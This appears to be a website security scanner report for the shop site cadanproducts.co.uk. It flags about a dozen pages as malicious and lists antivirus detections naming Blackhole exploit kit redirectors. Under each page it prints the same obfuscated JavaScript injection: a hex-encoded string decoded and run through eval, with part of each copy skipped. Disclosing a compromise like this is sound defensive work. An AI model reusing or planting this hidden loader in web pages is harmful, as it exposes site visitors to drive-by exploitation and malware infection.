Request | Server response | Status |
http://cadanproducts.co.uk/ | 200 OK Content-Length: 45920 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:6d:68:6d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6d:68:6d:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6d:68:6d
... 3402 bytes are skipped ...f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6d:68:6d:27:30:1f:20:32:4:1:74:4:1:74"[sp](":");}w=f;s=[];for(i=22-20-2;-i+1406!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BDD [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.CZ
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.BlackHole.CZ (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- Exploit.BlackHole.196
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BD
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.CZ
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.CZ
- ESET-NOD32
- JS/Kryptik.AOG
|
http://cadanproducts.co.uk/shop/index.html | 200 OK Content-Length: 45828 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:6d:68:6d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6d:68:6d:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6d:68:6d
... 3402 bytes are skipped ...f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6d:68:6d:27:30:1f:20:32:4:1:74:4:1:74"[sp](":");}w=f;s=[];for(i=22-20-2;-i+1406!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BDD [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.CZ
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.BlackHole.CZ (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- Exploit.BlackHole.196
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BD
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.CZ
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.CZ
- ESET-NOD32
- JS/Kryptik.AOG
|
http://cadanproducts.co.uk/shop/about_us.html | 200 OK Content-Length: 30601 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:6d:68:6d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6d:68:6d:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6d:68:6d
... 3402 bytes are skipped ...f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6d:68:6d:27:30:1f:20:32:4:1:74:4:1:74"[sp](":");}w=f;s=[];for(i=22-20-2;-i+1406!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BDD [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.CZ
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.BlackHole.CZ (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- Exploit.BlackHole.196
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BD
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.CZ
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.CZ
- ESET-NOD32
- JS/Kryptik.AOG
|
http://cadanproducts.co.uk/shop/our_delivery.html | 200 OK Content-Length: 30388 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:6d:68:6d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6d:68:6d:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6d:68:6d
... 3402 bytes are skipped ...f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6d:68:6d:27:30:1f:20:32:4:1:74:4:1:74"[sp](":");}w=f;s=[];for(i=22-20-2;-i+1406!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BDD [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.CZ
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.BlackHole.CZ (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- Exploit.BlackHole.196
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BD
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.CZ
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.CZ
- ESET-NOD32
- JS/Kryptik.AOG
|
http://cadanproducts.co.uk/shop/our_security.html | 200 OK Content-Length: 30557 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:6d:68:6d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6d:68:6d:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6d:68:6d
... 3402 bytes are skipped ...f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6d:68:6d:27:30:1f:20:32:4:1:74:4:1:74"[sp](":");}w=f;s=[];for(i=22-20-2;-i+1406!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BDD [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.CZ
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.BlackHole.CZ (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- Exploit.BlackHole.196
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BD
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.CZ
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.CZ
- ESET-NOD32
- JS/Kryptik.AOG
|
http://cadanproducts.co.uk/shop/contact_us.html | 200 OK Content-Length: 30480 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:6d:68:6d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6d:68:6d:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6d:68:6d
... 3402 bytes are skipped ...f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6d:68:6d:27:30:1f:20:32:4:1:74:4:1:74"[sp](":");}w=f;s=[];for(i=22-20-2;-i+1406!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BDD [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.CZ
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.BlackHole.CZ (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- Exploit.BlackHole.196
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BD
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.CZ
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.CZ
- ESET-NOD32
- JS/Kryptik.AOG
|
http://cadanproducts.co.uk/shop/enquiry.php | 200 OK Content-Length: 31306 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:6d:68:6d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6d:68:6d:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6d:68:6d
... 3402 bytes are skipped ...f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6d:68:6d:27:30:1f:20:32:4:1:74:4:1:74"[sp](":");}w=f;s=[];for(i=22-20-2;-i+1406!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BDD [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.CZ
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.BlackHole.CZ (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- Exploit.BlackHole.196
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BD
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.CZ
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.CZ
- ESET-NOD32
- JS/Kryptik.AOG
|
http://cadanproducts.co.uk/shop/help.html | 200 OK Content-Length: 35365 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:6d:68:6d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6d:68:6d:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6d:68:6d
... 3402 bytes are skipped ...f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6d:68:6d:27:30:1f:20:32:4:1:74:4:1:74"[sp](":");}w=f;s=[];for(i=22-20-2;-i+1406!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BDD [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.CZ
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.BlackHole.CZ (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- Exploit.BlackHole.196
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BD
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.CZ
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.CZ
- ESET-NOD32
- JS/Kryptik.AOG
|
http://cadanproducts.co.uk/shop/loginout.php?request=login | 200 OK Content-Length: 31783 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:6d:68:6d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6d:68:6d:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6d:68:6d
... 3402 bytes are skipped ...f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6d:68:6d:27:30:1f:20:32:4:1:74:4:1:74"[sp](":");}w=f;s=[];for(i=22-20-2;-i+1406!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BDD [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.CZ
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.BlackHole.CZ (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- Exploit.BlackHole.196
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BD
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.CZ
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.CZ
- ESET-NOD32
- JS/Kryptik.AOG
|
http://cadanproducts.co.uk/shop/mybasket.php?request=view | 200 OK Content-Length: 30435 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:6d:68:6d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6d:68:6d:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6d:68:6d
... 3402 bytes are skipped ...f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6d:68:6d:27:30:1f:20:32:4:1:74:4:1:74"[sp](":");}w=f;s=[];for(i=22-20-2;-i+1406!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BDD [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.CZ
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.BlackHole.CZ (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- Exploit.BlackHole.196
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BD
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.CZ
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.CZ
- ESET-NOD32
- JS/Kryptik.AOG
|
http://cadanproducts.co.uk/shop/index.html?PHPSESSID=rgsm78rasgif32dnou67p68af7 | 200 OK Content-Length: 48247 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:6d:68:6d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6d:68:6d:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6d:68:6d
... 3402 bytes are skipped ...f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6d:68:6d:27:30:1f:20:32:4:1:74:4:1:74"[sp](":");}w=f;s=[];for(i=22-20-2;-i+1406!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BDD [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.CZ
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.BlackHole.CZ (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- Exploit.BlackHole.196
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BD
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.CZ
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.CZ
- ESET-NOD32
- JS/Kryptik.AOG
|
http://cadanproducts.co.uk/shop/about_us.html?PHPSESSID=rgsm78rasgif32dnou67p68af7 | 200 OK Content-Length: 31651 Content-Type: text/html | malicious |
